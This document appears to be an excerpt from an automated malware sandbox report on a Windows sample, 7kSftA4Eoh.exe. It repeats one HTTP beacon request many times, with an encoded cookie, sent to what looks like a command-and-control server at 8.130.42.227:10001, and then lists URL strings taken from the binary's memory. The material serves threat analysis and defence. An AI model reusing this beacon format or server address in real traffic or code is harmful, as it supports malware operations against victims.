            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: */*Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)Host: 8.130.42.227:10001Connection: Keep-AliveCache-Control: no-cache
            Source: 7kSftA4Eoh.exe, 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:%u/
            Source: 7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000002.4125449731.000000000010A000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.130.42.227:10001/2yMe
